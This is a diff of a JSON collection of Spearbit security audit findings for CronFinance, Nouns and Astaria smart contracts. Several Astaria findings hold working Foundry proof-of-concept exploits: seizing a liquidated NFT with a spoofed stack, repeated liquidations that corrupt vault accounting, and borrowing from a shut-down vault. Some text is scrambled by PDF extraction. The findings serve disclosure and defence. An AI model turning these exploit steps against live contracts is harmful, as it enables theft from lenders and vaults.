"https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A number of CronV1Pool functions include reentrancy checks, however, they are only callable from a Balancer Vault function that already has a reentrancy check.", + "title": "Use a more recent Solidity version", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The compiler version used 0.8.6 is quite old (current version is 0.8.20). This version was released almost two years ago and there have been five applicable bug fixes to this version since then. While it seems that those bugs don't apply to the Nouns-Dao codebase, it is advised to update the compiler to a newer version.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational ERC721CheckpointableUpgradeable.sol#L46, NounsDAOExecutorV2.sol#L40, NounsDAOLog-" ] }, { - "title": "TWAMM Formula Computation Can Be Made Correct-By-Construction and Optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The linked lines are the core calculation of TWAMM virtual order execution. They involve checked arithmetic in the form of underflow-checked subtractions; there is thus a theoretical risk that rounding error could lead to a \"freezing\" of a TWAMM pool. One of the subtractions, that for token1OutU112, is already \"correct-by- construction\", i.e. it can never underflow. The calculation of token0OutU112 can be reformulated to be explicitly safe as well; the following overall refactoring is suggested: uint256 ammEndToken0 = (token1ReserveU112 * sum0) / sum1; uint256 ammEndToken1 = (token0ReserveU112 * sum1) / sum0; token0ReserveU112 = ammEndToken0; token1ReserveU112 = ammEndToken1; token0OutU112 = sum0 - ammEndToken0; token1OutU112 = sum1 - ammEndToken1; Both output calculations are now of the form x (cid:0) (x (cid:3) y)=(y + z) for non-negative x, y , and z, allowing subtraction operations to be unchecked, which is both a gas optimization and gives confidence the calculation cannot freeze up unexpectedly due to an underflow. Replacement of divDown by / gives equivalent semantics with lower overhead. An additional advantage of this formulation is its manifest symmetry under 0 < (cid:0) > 1 interchange; this serves as a useful heuristic check on the computation, as it should possess the same symmetry as the invariant.", + "title": "State modifications after external sToOwner prone to reentrancy attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "External NFT call happens before numTokensInEscrow update in returnTokensToOwner(). This looks safe (NFT is fixed to be noun contract and transferFrom() is used instead of the safe version, and also numTokensInEscrow = 0 in closeEscrow() acts as a control for numTokensInEscrow -= tokenIds.length logic), but in general this type of execution flow structuring could allow for direct stealing via reentrancy. I.e. in a presence of callback (e.g. arbitrary NFT instead of noun contract or safeTransferFrom instead of trans- ferFrom) and without numTokensInEscrow = 0 conflicting with numTokensInEscrow -= tokenIds.length, as an abstract example, an attacker would add the last needed noun for forking, then call withdrawFromForkEscrow() and then, being in returnTokensToOwner(), call executeFork() from the callback hook, successfully performing the fork, while already withdrawn the NFT that belongs to DAO. NounsDAOForkEscrow.sol#L110-L125) function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO { for (uint256 i = 0; i < tokenIds.length; i++) { if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner(); >> nounsToken.transferFrom(address(this), owner, tokenIds[i]); escrowedTokensByForkId[forkId][tokenIds[i]] = address(0); } numTokensInEscrow -= tokenIds.length; } NounsDAOV3Fork.sol#L109-L130 57 function executeFork(NounsDAOStorageV3.StorageV3 storage ds) external returns (address forkTreasury, address forkToken) { if (isForkPeriodActive(ds)) revert ForkPeriodActive(); INounsDAOForkEscrow forkEscrow = ds.forkEscrow; >> uint256 tokensInEscrow = forkEscrow.numTokensInEscrow(); if (tokensInEscrow <= forkThreshold(ds)) revert ForkThresholdNotMet(); uint256 forkEndTimestamp = block.timestamp + ds.forkPeriod; (forkTreasury, forkToken) = ds.forkDAODeployer.deployForkDAO(forkEndTimestamp, forkEscrow); sendProRataTreasury(ds, forkTreasury, tokensInEscrow, adjustedTotalSupply(ds)); uint32 forkId = forkEscrow.closeEscrow(); ds.forkDAOTreasury = forkTreasury; ds.forkDAOToken = forkToken; ds.forkEndTimestamp = forkEndTimestamp; emit ExecuteFork(forkId, forkTreasury, forkToken, forkEndTimestamp, tokensInEscrow); } Direct stealing as a result of state manipulations is possible conditional on an ability to enter a callback. Given the absense of the latter at the moment, but critical impact of the former, considering this as best practice recommen- dation and setting the severity to be informational.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational interactions make NounsDAOForkEscrow's returnToken-" ] }, { - "title": "Gas Optimizations In Bit Packing Functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The bit packing operations are heavily used throughout the gas-critical swap code path, the opti- mization of which was flagged as high-priority by the CronFi team. Thus they were carefully reviewed not just for correctness, but also for gas optimization. L119: unnecessary & due to check on L116 L175: could hardcode clearMask L203: could hardcode clearMask L240: could hardcode clearMask L241: unnecessary & due to check on line 237 L242: unnecessary & due to check on line 238 L292: could hardcode clearMask L328: could hardcode clearMask L343: unnecessary to mask when _isWord0 == true L359: unnecessary & operations due to checks on lines 356 and 357 L372: unnecessary masking L389: could hardcode clearMask L390: unnecessary & due to check on L387 L415: could 16 hardcode clearMask L416: unnecessary & operation due to check on line 413 L437: unnecessary clearMask L438: unnecessary & due to check on line 435 L464: could hardcode clearMask L465: unnecessary & due to check on line 462 Additionally, the following code pattern appears in multiple places: requireErrCode(increment <= CONST, CronErrors.INCREMENT_TOO_LARGE); value += increment; requireErrCode(value <= CONST, CronErrors.OVERFLOW); Unless there's a particular reason to want to detect a too-large increment separately from an overflow, these patterns could all be simplified to requireErrCode(CONST - value >= increment, CronErrors.OVERFLOW); value += increment; as any increment greater than CONST will cause overflow anyway and value is always in the correct range by construction. This allows CronErrors.INCREMENT_TOO_LARGE to be removed as well.", + "title": "No need to use an assembly block to get the chain ID", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Currently the getChainId() uses an assembly block to get the current chain ID when constructing the domain separator. This is not needed since there is a global variable for this already.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Using extra storage slot to store two mappings of the same information", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A second storage slot is used to store a duplicate mapping of the same token pair but in reverse order. If the tokens are sorted in a getter function then the second mapping does not need to be used.", + "title": "Naming convention for interfaces is not always always followed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The NounsTokenForkLike interface does not follow the standard naming convention for Solidity interfaces, which begins with an I prefix. This inconsistency can make it harder for developers to understand the purpose and usage of the contract.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Gas optimizations within _executeVirtualOrders function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Within the _executeVirtualOrders function there are a few gas optimizations that can be applied to reduce the contract size and gas consumed while the function is called. (!(virtualOrders.lastVirtualOrderBlock < _maxBlock && _maxBlock < block.number)) Is equivalent with: (virtualOrders.lastVirtualOrderBlock >= _maxBlock || _maxBlock >= block.number) This means that this always enters if _maxBlock == block.number which will result in unnecessary gas consump- tion. If cron fee is enabled, evoMem.feeShiftU3 will have a value meaning that the check on line 1536 is obsolete. Removing that check and the retrieve from storage will save gas.", + "title": "The extra data (encoded stack) provided to advanced orders to Seaport are not validated properly by the CollateralToken upon callback", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The extra data (encoded stack) provided to advanced orders to Seaport are not validated properly by the CollateralToken upon callback when validateOrder(...) order is called by Seaport. When a stack/lien gets liquidated an auction is created on Seaport with the offerer and zone set as the Col- lateralToken and the order type is full restricted so that the aforementioned call back is performed at the end of fulfilment/matching orders on Seaport. An extra piece of information which needs to be provided by the fulfiller or matcher on Seaport is the extra data which is the encoded stack. The only validation that happens during the call back is the following to make sure that the 1st consideration's token matches with the decoded stack's lien's token: ERC20 paymentToken = ERC20(zoneParameters.consideration[0].token); if (address(paymentToken) != stack.lien.token) { revert InvalidPaymentToken(); } Besides that one does not check that this stack corresponds to the same collateralId with the same lien id. So a bidder on Seaport can take advantage of this and provide a spoofed extra data as follows: 1. The borrower collateralises its NFT token and takes a lien from a public vault 2. The lien expires and a liquidator calls liquidate(...) for the corresponding stack. 3. The bidder creates a private vault and deposits 1 wei worth of WETH into it. 4. The bidder collateralises a fake NFT token and takes a lien with 1 wei worth of WETH as a loan 5. The bidder provides the encoded fake stack from the step 4 as an extra data to settle the auction for the real liquidated lien from step 2 on Seaport. The net result from these steps are that The original NFT token will be owned by the bidder. The change in the sum of the ETH and WETH balances of the borrower, liquidator and the bidder would be the original borrowed amount from step 1. (might be off by a few wei due to division errors when calculating the liquidator fees). The original public vault would not receive its loan amount from the borrower or the auction amount the Seaport liquidation auction. If the borrower, the liquidator and the bidder were the same, this entity would end up with its original NFT token plus the loaned amount from the original public vault. If the liquidator and the bidder were the same, the bidder would end up with the original NFT token and might have to pay around 1 wei due to division errors. The borrower gets to keep its loan. The public vault would not receive the loan or any portion of the amount settled in the liquidation auction. The following diff in the test contracts is needed for the PoC to work: 5 diff --git a/src/test/TestHelpers.t.sol b/src/test/TestHelpers.t.sol index fab5fbd..5c9bfc8 100644 --- a/src/test/TestHelpers.t.sol +++ b/src/test/TestHelpers.t.sol @@ -163,7 +163,6 @@ contract ConsiderationTester is BaseSeaportTest, AmountDeriver { vm.label(address(this), \"testContract\"); } } - contract TestHelpers is Deploy, ConsiderationTester { using CollateralLookup for address; using Strings2 for bytes; @@ -1608,7 +1607,7 @@ contract TestHelpers is Deploy, ConsiderationTester { orders, new CriteriaResolver[](0), fulfillments, address(this) incomingBidder.bidder - + ); } else { consideration.fulfillAdvancedOrder( @@ -1621,7 +1620,7 @@ contract TestHelpers is Deploy, ConsiderationTester { ), new CriteriaResolver[](0), bidderConduits[incomingBidder.bidder].conduitKey, address(this) incomingBidder.bidder - + ); } delete fulfillments; The PoC: forge t --mt testScenario9 --ffi -vvv // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 8: commitToLien -> liquidate -> settle Seaport auction with mismtaching stack as an ,! extraData function testScenario9() public { TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); vm.label(address(this), \"borrowerContract\"); { // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); vm.label(publicVault, \"Public Vault\"); // lend 10 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 10 ether}), payable(publicVault) 6 ); WETH9.balanceOf(publicVault)); emit log_named_uint(\"Public vault WETH balance before commiting to a lien\", ,! emit log_named_uint(\"borrower ETH balance before commiting to a lien\", address(this).balance); emit log_named_uint(\"borrower WETH balance before commiting to a lien\", ,! WETH9.balanceOf(address(this))); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); assertEq( nft.ownerOf(tokenId), address(COLLATERAL_TOKEN), \"The bidder did not receive the collateral token after the auction end.\" ); WETH9.balanceOf(publicVault)); emit log_named_uint(\"Public vault WETH balance after commiting to a lien\", ,! emit log_named_address(\"NFT token owner\", nft.ownerOf(tokenId)); emit log_named_uint(\"borrower ETH balance after commiting to a lien\", address(this).balance); emit log_named_uint(\"borrower WETH balance after commiting to a lien\", ,! WETH9.balanceOf(address(this))); uint256 collateralId = tokenContract.computeId(tokenId); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, \"Strategist has incorrect share balance\" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralId), address(this), \"CollateralToken not minted to borrower\" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); vm.label(liquidatorOne, \"liquidator 1\"); // liquidate the lien vm.startPrank(liquidatorOne); 7 emit log_named_uint(\"liquidator WETH balance before liquidation\", WETH9.balanceOf(liquidatorOne)); OrderParameters memory listedOrder = _liquidate(stack); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, \"liquidator is not stored in s.collateralLiquidator[collateralId]\" ); // --- start of the attack --- vm.label(bidder, \"bidder\"); vm.startPrank(bidder); TestNFT fakeNFT = new TestNFT(1); address fakeTokenContract = address(fakeNFT); uint256 fakeTokenId = uint256(0); vm.stopPrank(); address privateVault = _createPrivateVault( bidder, bidder ); vm.label(privateVault, \"Fake Private Vault\"); _lendToPrivateVault( PrivateLender({ addr: bidder, amountToLend: 1 wei, token: address(WETH9) }), payable(privateVault) ); vm.startPrank(bidder); // it is important that the fakeStack.lien.token is the same as the original stack's token // below deals 1 wei to the bidder which is also the fakeStack borrower (, ILienToken.Stack memory fakeStack) = _commitToLien({ vault: payable(privateVault), strategist: bidder, strategistPK: bidderPK, tokenContract: fakeTokenContract, tokenId: fakeTokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, // needs to be non-zero duration: 1 hours, // s.minLoanDuration maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 wei }), amount: 1 wei }); emit log_named_uint(\"CollateralToken WETH balance before auction end\", ,! WETH9.balanceOf(address(COLLATERAL_TOKEN))); // _bid deals 300 ether to the bidder _bid( Bidder({bidder: bidder, bidderPK: bidderPK}), listedOrder, // order paramters created for the original stack during the liquidation 100 ether, // stack.lien.details.liquidationInitialAsk 8 fakeStack ); emit log_named_uint(\"Public vault WETH balance after auction end\", WETH9.balanceOf(publicVault)); emit log_named_uint(\"borrower WETH balance after auction end\", WETH9.balanceOf(address(this))); emit log_named_uint(\"liquidator WETH balance after auction end\", WETH9.balanceOf(liquidatorOne)); emit log_named_uint(\"bidder WETH balance after auction end\", WETH9.balanceOf(bidder)); emit log_named_uint(\"bidder ETH balance before commiting to a lien\", address(bidder).balance); emit log_named_uint(\"CollateralToken WETH balance after auction end\", ,! emit log_named_address(\"bidder\", bidder); emit log_named_address(\"owner of the original collateral after auction end\", ,! WETH9.balanceOf(address(COLLATERAL_TOKEN))); nft.ownerOf(tokenId)); // _removeLien is not called for collateralId assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, \"_removeLien is called for collateralId\" ); // WETH balance of the public vault is still 0 even after the auction assertEq( WETH9.balanceOf(publicVault), 0 ); } assertEq( nft.ownerOf(tokenId), bidder, \"The bidder did not receive the collateral token after the auction end.\" ); }", "labels": [ - "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Spearbit", + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "Initializing with default value is consuming unnecessary gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Every variable declaration followed by initialization with a default value is gas consuming and obso- lete. The provided line within the context is just an example.", + "title": "AstariaRouter.liquidate(...) can be called multiple times for an expired lien/stack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The current implementation of the protocol does not have any safeguard around calling Astari- aRouter.liquidate(...) only once for an expired stack/lien. Thus, when a lien expires, multiple adversaries can override many different parameters by calling this endpoint at will in the same block or different blocks till one of the created auctions settles (which might not as one can keep stacking these auctions with some delays to have a never-ending liquidation flow). Here is the list of storage parameters that can be manipulated: s.collateralLiquidator[stack.lien.collateralId].amountOwed in LienToken: it is possible to keep in- creasing this value if we stack calls to the liquidate(...) with delays. s.collateralLiquidator[stack.lien.collateralId].liquidator in LienToken: This can be overwritten and would hold the last liquidator's address and so only this liquidator can claim the NFT if the auction its corresponding auction does not settle and also it would receive the liquidation fees. s.idToUnderlying[params.collateralId].auctionHash in CollateralToken: would hold the last created auction's order hash for the same expired lien backed by the same collateral. slope in PublicVault: If the lien is taken from a public vault, each call to liquidate(...) would reduce this value. So we can make this slope really small. s.epochData[epoch].liensOpenForEpoch in PublicVault: If the lien is taken from a public vault, each call to liquidate(...) would reduce this value. So we can make this slope really small or even 0 depends on the rate of this lien and the slope of the vault due to arithmetic underflows. yIntercept in PublicVault: Mixing the manipulation of the vault's slope and stacking the calls to liqui- date(...) with delays we can also manipulate yIntercept. // add the following test case to: // file: src/test/LienTokenSettlementScenarioTest.t.sol function testScenario8() public { TestNFT nft = new TestNFT(2); address tokenContract = address(nft); uint256 tokenIdOne = uint256(0); uint256 tokenIdTwo = uint256(1); uint256 initialBalance = WETH9.balanceOf(address(this)); // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); // lend 20 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 20 ether}), payable(publicVault) ); uint256 vaultShares = PublicVault(payable(publicVault)).totalSupply(); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stackOne) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdOne, lienDetails: ILienToken.Details({ 10 maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); // borrow 10 eth against the dummy NFT with tokenId 1 (, ILienToken.Stack memory stackTwo) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdTwo, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); uint256 collateralIdOne = tokenContract.computeId(tokenIdOne); uint256 collateralIdTwo = tokenContract.computeId(tokenIdTwo); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, \"Strategist has incorrect share balance\" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdOne), address(this), \"CollateralToken not minted to borrower\" ); assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdTwo), address(this), \"CollateralToken not minted to borrower\" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); address liquidatorTwo = vm.addr(0x1195da7052); vm.label(liquidatorOne, \"liquidator 1\"); vm.label(liquidatorTwo, \"liquidator 2\"); // liquidate the first lien vm.startPrank(liquidatorOne); OrderParameters memory listedOrder = _liquidate(stackOne); vm.stopPrank(); 11 assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorOne, \"liquidator is not stored in s.collateralLiquidator[collateralId]\" ); // // liquidate the first lien with a different liquidator vm.startPrank(liquidatorTwo); listedOrder = _liquidate(stackOne); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorTwo, \"liquidator is not stored in s.collateralLiquidator[collateralId]\" ); // validate the slope is updated twice for the same expired lien // and so the accounting for the public vault is manipulated assertEq( PublicVault(payable(publicVault)).getSlope(), 0, \"PublicVault slope divergent\" ); // publicVault.storageSlot.epochData[epoch].liensOpenForEpoch is also dfecremented twice // CollateralToken.storageSlot.idToUnderlying[params.collateralId].auctionHash can also be ,! manipulated }", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "Factory requirement can be circumvented within the constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The constructor checks if the _factory parameter is the msg.sender. This behavior was, at first, created so that only the factory would be able to deploy pools. The check on line 484 is obsolete as pools deployed via the factory, will always have msg.sender == factory address, making the _factory parameter obsolete as well.", + "title": "maxStrategistFee is incorrectly set in AstariaRouter's constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In AstariaRouter's constructor we set the maxStrategistFee as s.maxStrategistFee = uint256(50e17); // 5e18 But in the filing route we check that this value should not be greater than 1e18. 12 maxStrategistFee is supposed to set an upper bound for public vaults's strategist vault fee. When a payment is made for a lien, one calculates the shares to be minted for the strategist based on this value and the interest amount paid: function _handleStrategistInterestReward( VaultData storage s, uint256 interestPaid ) internal virtual { if (VAULT_FEE() != uint256(0) && interestPaid > 0) { uint256 fee = interestPaid.mulWadDown(VAULT_FEE()); uint256 feeInShares = convertToShares(fee); _mint(owner(), feeInShares); } } Note that we are using mulWadDown(...) here: F = j I (cid:1) f 1018k parameter description F f I fee VAULT_FEE() interestPaid so we would want f (cid:20) 1018. Currently, a vault could charge 5 times the interest paid.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Usability: added remove, set pool functionality to CronV1PoolFactory (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Conversations with the audit team indicated functions were needed to manage pool mappings post- creation in the event that a pool needed to be deprecated or replaced.", + "title": "When a vault is shutdown a user can still commit to liens using the vault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a vault is shutdown, one should not be able to take more liens using the funds from this vault. In the commit to lien flow, AstariaRouter fetches the state of the vault 13 ( , address delegate, address owner, , , // s.isShutdown uint256 nonce, bytes32 domainSeparator ) = IVaultImplementation(c.lienRequest.strategy.vault).getState(); But does not use the s.isShutdown flag to stop the flow if it is set to true. When a vault is shutdown we should have: vault endpoint reverts should revert deposit mint redeem withdraw redeemFutureEpoch payment flows liquidation flows commitToLien YES YES NO NO NO NO NO YES // add this test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 12: create vault > shutdown > commitToLien function testScenario12() public { { console2.log(\"--- test private vault shutdown ---\"); uint256 ownerPK = uint256(0xa77ac3); address owner = vm.addr(ownerPK); vm.label(owner, \"owner\"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address privateVault = _createPrivateVault(owner, owner); vm.label(privateVault, \"privateVault\"); console2.log(\"[+] private vault is created: %s\", privateVault); // lend 1 wei to the privateVault _lendToPrivateVault( PrivateLender({addr: owner, amountToLend: 1 wei, token: address(WETH9)}), payable(privateVault) ); console2.log(\"[+] lent 1 wei to the private vault.\"); console2.log(\"[+] shudown private vault.\"); 14 vm.startPrank(owner); Vault(payable(privateVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(privateVault)).getShutdown(), true, \"Private Vault should be shutdown.\" ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(privateVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: \"\" }); console2.log(\"[+] borrowed 1 wei against the private vault.\"); lienId: %s\", lienId); console2.log(\" owner of lienId: %s\\n\\n\", LIEN_TOKEN.ownerOf(lienId)); console2.log(\" assertEq( LIEN_TOKEN.ownerOf(lienId), owner, \"owner should be the owner of the lienId.\" ); } { console2.log(\"--- test public vault shutdown ---\"); uint256 ownerPK = uint256(0xa77ac322); address owner = vm.addr(ownerPK); vm.label(owner, \"owner\"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address publicVault = _createPublicVault(owner, owner, 14 days); vm.label(publicVault, \"publicVault\"); console2.log(\"[+] public vault is created: %s\", publicVault); // lend 1 wei to the publicVault _lendToVault( Lender({addr: owner, amountToLend: 1 ether}), payable(publicVault) ); 15 console2.log(\"[+] lent 1 ether to the public vault.\"); console2.log(\"[+] shudown public vault.\"); vm.startPrank(owner); Vault(payable(publicVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(publicVault)).getShutdown(), true, \"Public Vault should be shutdown.\" ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(publicVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: \"\" }); console2.log(\"[+] borrowed 1 wei against the public vault.\"); console2.log(\" console2.log(\" lienId: %s\", lienId); owner of lienId: %s\", LIEN_TOKEN.ownerOf(lienId)); assertEq( LIEN_TOKEN.ownerOf(lienId), publicVault, \"Public vault should be the owner of the lienId.\" ); } } forge t --mt testScenario12 --ffi -vvv: 16 --- test private vault shutdown --- [+] private vault is created: 0x7BF14E2ad40df80677D356099565a08011B72d66 [+] lent 1 wei to the private vault. [+] shudown private vault. [+] borrowed 1 wei against the private vault. lienId: 78113226609386929237635937490344951966356214732432064308195118046023211325984 owner of lienId: 0x60873Bc6F2C9333b465F60e461cf548EfFc7E6EA --- test public vault shutdown --- [+] public vault is created: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6 [+] lent 1 ether to the public vault. [+] shudown public vault. [+] borrowed 1 wei against the public vault. lienId: 13217102800774263219074199159187108198090219420208960450275388834853683629020 owner of lienId: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Virtual oracle getter--gets oracle value at block > lvob (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Through the audit process, sufficient contract space became available to add an oracle getter con- venience that returns the oracle values and timestamps. However, this leaves the problem of not being able to get the oracle price at the current block in a pool with low volume but virtual orders active.", + "title": "transfer(...) function in _issuePayout(...) can be replaced by a direct call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In the _issuePayout(...) internal function of the VaultImplementation if the asset is WETH the amount is withdrawn from WETH to native tokens and then transfered to the borrower: if (asset() == WETH()) { IWETH9 wethContract = IWETH9(asset()); wethContract.withdraw(newAmount); payable(borrower).transfer(newAmount); } transfer limits the amount of gas shared to the call to the borrower which would prevent executing a complex callback and due to changes in gas prices in EVM it might even break some feature for a potential borrower contract. For the analysis of the flow for both types of vaults please refer to the following issue: 'Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow'", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Loss of assets due to rounding during _longTermSwap", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "When a long term swap (LT) is created, the selling rate for that LT is set based on the amount and the number of blocks that order will be traded for. uint256 lastExpiryBlock = block.number - (block.number % ORDER_BLOCK_INTERVAL); uint256 orderExpiry = ORDER_BLOCK_INTERVAL * (_orderIntervals + 1) + lastExpiryBlock; // +1 protects from div 0 ,! uint256 tradeBlocks = orderExpiry - block.number; uint256 sellingRateU112 = _amountInU112 / tradeBlocks; During the computation of the number of blocks, the order must trade for, defined as tradeBlocks, the order expiry is computed from the last expiry block based on the OBI (Order Block Interval). If tradeBlocks is big enough (it can be a max of 176102 based on the STABLE_MAX_INTERVALS ), then sellingRa- teU112 will suffer a loss due to solidity rounding down behavior. This is a manageable loss for tokens with big decimals but for tokens with low decimals, will create quite an impact. E.g. wrapped BTC has 8 decimals. the MAX_ORDER_INTERVALS can be max 176102 as per stable max intervals defined within the constants. that being said a user can lose quite a significant value of BTC: 0.00176101 This issue is marked as Informational severity as the amount lost might not be that significant. This can change in the future if the token being LTed has a big value and a small number of decimals.", + "title": "Storage parameters are updated after a few callback sites to external addresses in the commit- ToLien(...) flow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In the commitToLien(...) flow the following storage parameters are updated after some of the external call back sites when payout is issued or a lien is transferred from a private vault to its owner: 26 collateralStateHash in LienToken: One can potentially re-enter to take another lien using the same col- lateral, but this is not possible since the collateral NFT token is already transferred to the CollateralToken (unless one is dealing with some esoteric NFT token). The createLien(...) requires this parameter to be 0., and that's why a potential re-entrancy can bypass this requirement. | Read re-entrancy: Yes slope in PublicVault: - | Read re-entrancy: Yes liensOpenForEpoch in PublicVault: If flash liens are allowed one can re-enter and process the epoch before finishing the commitToLien(...). And so the processed epoch would have open liens even though we would want to make sure this could not happen | Read re-entrancy: Yes The re-entrancies can happen if the vault asset performs a call back to the receiver when transferring tokens (during issuance of payouts). And if one is dealing with WETH, the native token amount is transfer(...) to the borrower. Note in the case of Native tokens if the following recommendation from the below issue is considered the current issue could be of higher risk: 'transfer(...) function in _issuePayout(...) can be replaced by a direct call'", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Inaccuracies in Comments", - "html_url": 